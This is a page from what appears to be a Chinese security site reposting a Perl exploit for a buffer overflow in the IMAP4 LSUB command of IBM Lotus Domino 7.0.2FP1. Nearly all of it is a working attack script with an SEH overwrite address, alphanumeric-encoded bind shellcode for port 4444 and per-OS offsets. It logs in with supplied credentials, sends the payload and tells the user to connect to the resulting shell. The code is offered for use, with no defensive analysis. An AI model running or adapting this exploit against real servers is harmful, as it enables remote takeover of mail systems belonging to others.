首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛

当前位置：主页>安全文章>文章资料>Exploits>文章内容 IBM Lotus Domino 7.0.2FP1 IMAP4 Server LSUB Command Exploit 来源：FistFuXXer@gmx.de 作者：Manuel 发布时间：2007-10-29   #!perl # # "IBM Lotus Domino" IMAP4 Server 'LSUB' Command Exploit # # Author:  Manuel Santamarina Suarez # e-Mail:  FistFuXXer@gmx.de # use IO::Socket; use File::Basename; # # destination TCP port # $port = 143; # # SE handler # # You can only use HEX values from 0x20 to 0x7e! (printable ASCII characters) # You must use a POP/POP/RET sequence that doesn't modify the ESP register or # the shellcode decoder will fail. # $seh = reverse( "\x60\x21\x53\x4E" );  # POP EDI/POP EBP/RET                                        # nnotes.6021534e                                        # universal on Lotus Domino 7.0.2FP1 # # Shellcode # You can only use HEX values from 0x20 to 0x7e! (printable ASCII characters) # # 1. Step: Modified Win32 Bind Shellcode (EXITFUNC=thread, LPORT=4444) # 2. Step: Encoded with Alpha 2.0 (BASEADDRESS=ESP) # $sc = "TYIIIIIIIIIIIIIIII7QZjAXP0A0AkAAQ2AB2BB0BBABXP8ABuJIeyZiMSKYnPYI".       "JNJy0tGTydqKOqcCDS2wDWLMnzmSxkYlkRYdLksMRFhWoOZNbRe5mxBWuVHvqcFS".       "7vIORKmLzQmOToWf3RvqWhTOUViUD7Wfqvn3yLusEVmKMiuvBmuSkKNsrmzNpPhV".       "bgOgpVIEsVRNpl2cOYnRDbl26fJePsR6cVkLKlUKO6TQWx6kLLpqRtGKVftSekP3".       "OaKKlTgVV6KNyLqDoMtQB75KWvJJ0KoJGvzzSog9M5ftwiwisQkzMxiQXkyYDqqo".       "ONy8uocPKNMxUX2crRPJWOKlsPavRLQWQbPLs8MNphKLZvXznenx5RamlOQumWQo".       "btLSI2OJYJe5mQ0DyNyY7tctxNJiR4pDcBpJUaCOmLo6uaPDVdcKyRSOUyOpewzp".       "ZzPeMQSMmMZkdBkXaMZRl3lzLcBSUPM8skzitBixQMibMbaNfkXSWp9xSkzjUSRc".       "hX2EMWOt8eQmdn8QJTHMNHIQKhpemWRQYwkNvQSOXnL7yN9bXgiZfnGNQQUClp3M".       "HIECH5WVPM59KMkYZolwliSeoQwyJzBMH5FQYlMlJEHhLiLdOkQu5rpS2RrltL70".       "YO8KFfqVm7mKtFcvxXzkoXKwxe6WLNuB3sYYY8kqm73UlhEp0rQZKl1PbQDYOcPs".       "RRRlfem8aMibLxKi0mij5TKXQKcUk76wlMLZA"; # # JUMP to 'ESP adjustment' and shellcode # $jmp = "\x74\x20".  # JE SHORT        "\x75\x20";  # JNZ SHORT # # # Don't edit anything after this line # # $sc_limit = 2300; sub usage {     print "Usage: " . basename( $0 ) . " [target] [IPv4 address] [username] [password]\n".           "Example: ". basename( $0 ) . " 1 192.168.1.19 \"Bill Gates/ServerName\" \"P4ssw0rd\"\n".           "\n".           "Targets:\n".           "[1]  Lotus Domino 7.0.2FP1 on Windows Server 2000 SP4\n".           "[2]  Lotus Domino 7.0.2FP1 on Windows Server 2003 SP2\n";     exit; } # Net::IP::ip_is_ipv4 sub ip_is_ipv4 {     my $ip = shift;     unless ($ip =~ m/^[\d\.]+$/) {         return 0;     }     if ($ip =~ m/^\./) {         return 0;     }     if ($ip =~ m/\.$/) {         return 0;     }     if ($ip =~ m/^(\d+)$/ and $1 < 256) {         return 1     }     my $n = ($ip =~ tr/\./\./);     unless ($n >= 0 and $n < 4) {         return 0;     }     if ($ip =~ m/\.\./) {         return 0;     }     foreach (split /\./, $ip) {         unless ($_ >= 0 and $_ < 256) {             return 0;         }     }         return 1; } print "--------------------------------------------------------\n".       ' "IBM Lotus Domino" IMAP4 Server \'LSUB\' Command Exploit'."\n".       "--------------------------------------------------------\n\n"; if( ($#ARGV+1) != 4 ) {     &usage; } $user = $ARGV[2]; $pass = $ARGV[3]; # Windows 2000 SP4 if( $ARGV[0] == 1 ) {     $popad = "\x41" x 3 .  # INC ECX              "\x61" x 51;  # POPAD } # Windows 2003 SP2 elsif( $ARGV[0] == 2 ) {     $popad = "\x41" x 2 .  # INC ECX              "\x61" x 52;  # POPAD } else {     &usage; }     if( ip_is_ipv4( $ARGV[1] ) ) {     $ip = $ARGV[1]; } else {     &usage; } if( length( $sc ) > $sc_limit ) {     print "[-] Error: Shellcode's size exceeds $sc_limit bytes!\n";     exit; } print "[+] Connecting to $ip:$port...\n"; $sock = IO::Socket::INET->new (     PeerAddr => $ip,     PeerPort => $port,     Proto    => 'tcp',     Timeout  => 2 ) or print "[-] Error: Couldn't establish a connection to $ip:$port!\n" and exit; print "[+] Connected.\n"; $mailbox = "\x44" x 280 . $jmp . $seh . "\x44" x 26 . $popad . $sc . "\x44" x 3000; $sock->recv( $recv, 1024 ); $sock->send( "a001 LOGIN \"$user\" \"$pass\"\r\n" ); $sock->recv( $recv, 1024 ); if( $recv ne "a001 OK LOGIN completed\r\n" ) {     print "[-] Error: Invalid username or password!\n";     exit; } print "[+] Successfully logged in.\n".       "[+] Trying to overwrite and control the SE handler...\n"; $sock->send( "a002 SUBSCRIBE {" . length( $mailbox ) . "}\r\n" ); $sock->recv( $recv, 1024 ); $sock->send( "$mailbox\r\n" ); $sock->recv( $recv, 1024 ); $sock->send( "a003 LSUB arg1 arg2\r\n" ); sleep( 3 ); close( $sock ); print "[+] Done. Now check for a bind shell on $ip:4444!\n";   [推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]   匿名评论 评论内容：(不能超过250字，需审核后才会公布，请自觉遵守互联网相关政策法规。  §最新评论：

热点文章 ·CVE-2012-0217 Intel sysret exp ·Linux Kernel 2.6.32 Local Root ·Array Networks vxAG / xAPV Pri ·Novell NetIQ Privileged User M ·Array Networks vAPV / vxAG Cod ·Excel SLYK Format Parsing Buff ·PhpInclude.Worm - PHP Scripts ·Apache 2.2.0 - 2.2.11 Remote e ·VideoScript 3.0 <= 4.0.1.50 Of ·Yahoo! Messenger Webcam 8.1 Ac ·Family Connections <= 1.8.2 Re ·Joomla Component EasyBook 1.1   相关文章 ·IBM Tivoli Storage Manager 5.3 ·GOM Player 2.1.6.3499 (GomWeb3 ·Jakarta Slide <= 2.1 RC1 Remot ·Sony CONNECT Player 4.x (m3u F ·eIQnetworks ESA SEARCHREPORT R ·Kodak Image Viewer TIF/TIFF Co ·Oracle 10g CTX_DOC.MARKUP SQL ·PHP-AGTC membership system 1.1 ·DNS Recursion bandwidth amplif ·SonicWall SSL-VPN NeLaunchCtrl ·Mozilla Firefox <= 2.0.0.7 Rem ·BC Explorer <= 7.20 RC 1 Remot   推荐广告

CopyRight © 2002-2022 VFocuS.Net All Rights Reserved